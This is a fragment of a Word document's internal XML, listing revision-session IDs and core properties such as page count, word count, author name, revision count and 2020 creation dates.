    <w:rsid w:val="00811AA2"/>
    <w:rsid w:val="00824CCC"/>
    <w:rsid w:val="00854421"/>
    <w:rsid w:val="00860DEA"/>
    <w:rsid w:val="008663C3"/>
    <w:rsid w:val="008667E8"/>
    <w:rsid w:val="00871E97"/>
    <w:rsid w:val="00876B02"/>
    <w:rsid w:val="00883E21"/>
    <w:rsid w:val="008933A0"/>
    <w:rsid w:val="00894D1B"/>
    <w:rsid w:val="008A64AF"/>
    <w:rsid w:val="008B267A"/>
    <w:rsid w:val="008B3952"/>
    <w:rsid w:val="008B6F6C"/>
    <w:rsid w:val="008C051B"/>
    <w:rsid w:val="008E21C7"/>
    <w:rsid w:val="008E625D"/>
    <w:rsid w:val="008F530F"/>
    <w:rsid w:val="008F635E"/>
    <w:rsid w:val="0090392C"/>
    <w:rsid w:val="0090768E"/>
    <w:rsid w:val="00907ECC"/>
    <w:rsid w:val="00911247"/>
    <w:rsid w:val="009118AF"/>
    <w:rsid w:val="00920736"/>
    <w:rsid w:val="00922FF8"/>
    <w:rsid w:val="0093004A"/>
    <w:rsid w:val="00937072"/>
    <w:rsid w:val="009462D7"/>
    <w:rsid w:val="0096190D"/>
    <w:rsid w:val="009678B5"/>
    <w:rsid w:val="00974912"/>
    <w:rsid w:val="00975206"/>
    <w:rsid w:val="0097777A"/>
    <w:rsid w:val="0098227D"/>
    <w:rsid w:val="0098467E"/>
    <w:rsid w:val="00993C91"/>
    <w:rsid w:val="009A0DE2"/>
    <w:rsid w:val="009A6536"/>
    <w:rsid w:val="009A7586"/>
    <w:rsid w:val="009C1A0B"/>
    <w:rsid w:val="009C3727"/>
    <w:rsid w:val="009C38E9"/>
    <w:rsid w:val="009D1C02"/>
    <w:rsid w:val="009D1C62"/>
    <w:rsid w:val="009D3A34"/>
    <w:rsid w:val="009E48EC"/>
    <w:rsid w:val="009F50B5"/>
    <w:rsid w:val="009F7E33"/>
    <w:rsid w:val="00A029B8"/>
    <w:rsid w:val="00A02F51"/>
    <w:rsid w:val="00A04A33"/>
    <w:rsid w:val="00A05895"/>
    <w:rsid w:val="00A12932"/>
    <w:rsid w:val="00A21272"/>
    <w:rsid w:val="00A2586D"/>
    <w:rsid w:val="00A44FF4"/>
    <w:rsid w:val="00A47BEA"/>
    <w:rsid w:val="00A804A3"/>
    <w:rsid w:val="00A84A66"/>
    <w:rsid w:val="00A95FAE"/>
    <w:rsid w:val="00AC239C"/>
    <w:rsid w:val="00AD4485"/>
    <w:rsid w:val="00AE126E"/>
    <w:rsid w:val="00AE1F0A"/>
    <w:rsid w:val="00AE54EA"/>
    <w:rsid w:val="00B02E9B"/>
    <w:rsid w:val="00B16C92"/>
    <w:rsid w:val="00B31D09"/>
    <w:rsid w:val="00B4064B"/>
    <w:rsid w:val="00B50D16"/>
    <w:rsid w:val="00B56575"/>
    <w:rsid w:val="00B57E6E"/>
    <w:rsid w:val="00B65DF7"/>
    <w:rsid w:val="00B770F1"/>
    <w:rsid w:val="00B91C50"/>
    <w:rsid w:val="00B96B17"/>
    <w:rsid w:val="00BA36B9"/>
    <w:rsid w:val="00BA55A7"/>
    <w:rsid w:val="00BB0C1D"/>
    <w:rsid w:val="00BB1694"/>
    <w:rsid w:val="00BB66F5"/>
    <w:rsid w:val="00BC24F8"/>
    <w:rsid w:val="00BC6F53"/>
    <w:rsid w:val="00BC7DD3"/>
    <w:rsid w:val="00BD1EE7"/>
    <w:rsid w:val="00BE00E2"/>
    <w:rsid w:val="00BE2895"/>
    <w:rsid w:val="00C005F2"/>
    <w:rsid w:val="00C03AD2"/>
    <w:rsid w:val="00C04BD5"/>
    <w:rsid w:val="00C059E9"/>
    <w:rsid w:val="00C13D17"/>
    <w:rsid w:val="00C5138F"/>
    <w:rsid w:val="00C62DF2"/>
    <w:rsid w:val="00C67B48"/>
    <w:rsid w:val="00C70DD7"/>
    <w:rsid w:val="00C72236"/>
    <w:rsid w:val="00C74A6C"/>
    <w:rsid w:val="00C8328C"/>
    <w:rsid w:val="00C84E78"/>
    <w:rsid w:val="00C855E8"/>
    <w:rsid w:val="00CA0B2A"/>
    <w:rsid w:val="00CA4458"/>
    <w:rsid w:val="00CC694C"/>
    <w:rsid w:val="00CD02E2"/>
    <w:rsid w:val="00CE4296"/>
    <w:rsid w:val="00CF0687"/>
    <w:rsid w:val="00CF1CF7"/>
    <w:rsid w:val="00D03807"/>
    <w:rsid w:val="00D11884"/>
    <w:rsid w:val="00D52620"/>
    <w:rsid w:val="00D82469"/>
    <w:rsid w:val="00D878E0"/>
    <w:rsid w:val="00DA00EC"/>
    <w:rsid w:val="00DA3669"/>
    <w:rsid w:val="00DB2258"/>
    <w:rsid w:val="00DB6BF2"/>
    <w:rsid w:val="00DD0982"/>
    <w:rsid w:val="00DD0EC0"/>
    <w:rsid w:val="00DE17B5"/>
    <w:rsid w:val="00DF0D84"/>
    <w:rsid w:val="00DF1A7B"/>
    <w:rsid w:val="00E050F0"/>
    <w:rsid w:val="00E12175"/>
    <w:rsid w:val="00E20E70"/>
    <w:rsid w:val="00E22BF5"/>
    <w:rsid w:val="00E27D0A"/>
    <w:rsid w:val="00E433B9"/>
    <w:rsid w:val="00E45B76"/>
    <w:rsid w:val="00E47BDE"/>
    <w:rsid w:val="00E60C11"/>
    <w:rsid w:val="00E632BF"/>
    <w:rsid w:val="00E660E4"/>
    <w:rsid w:val="00E81817"/>
    <w:rsid w:val="00E92A2E"/>
    <w:rsid w:val="00EB3EF0"/>
    <w:rsid w:val="00EC6AE0"/>
    <w:rsid w:val="00ED284F"/>
    <w:rsid w:val="00EE2070"/>
    <w:rsid w:val="00EF29B1"/>
    <w:rsid w:val="00F02838"/>
    <w:rsid w:val="00F06CD0"/>
    <w:rsid w:val="00F07F7A"/>
    <w:rsid w:val="00F07FD9"/>
    <w:rsid w:val="00F344EB"/>
    <w:rsid w:val="00F435BD"/>
    <w:rsid w:val="00F453A5"/>
    <w:rsid w:val="00F55F7A"/>
    <w:rsid w:val="00F56201"/>
    <w:rsid w:val="00F56ADC"/>
    <w:rsid w:val="00F71995"/>
    <w:rsid w:val="00F80432"/>
    <w:rsid w:val="00F814E9"/>
    <w:rsid w:val="00F82812"/>
    <w:rsid w:val="00F86C81"/>
    <w:rsid w:val="00F97646"/>
    <w:rsid w:val="00F97D5F"/>
    <w:rsid w:val="00FA6C99"/>
    <w:rsid w:val="00FF1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5B504"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EE1D57BE-1097-4F9C-B622-0EE50227E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77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2868</TotalTime>
  <Pages>31</Pages>
  <Words>2709</Words>
  <Characters>14280</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>680</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Jiyuan Lu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jiyuan Lu</cp:lastModifiedBy>
  <cp:revision>308</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-02T22:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-05T02:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>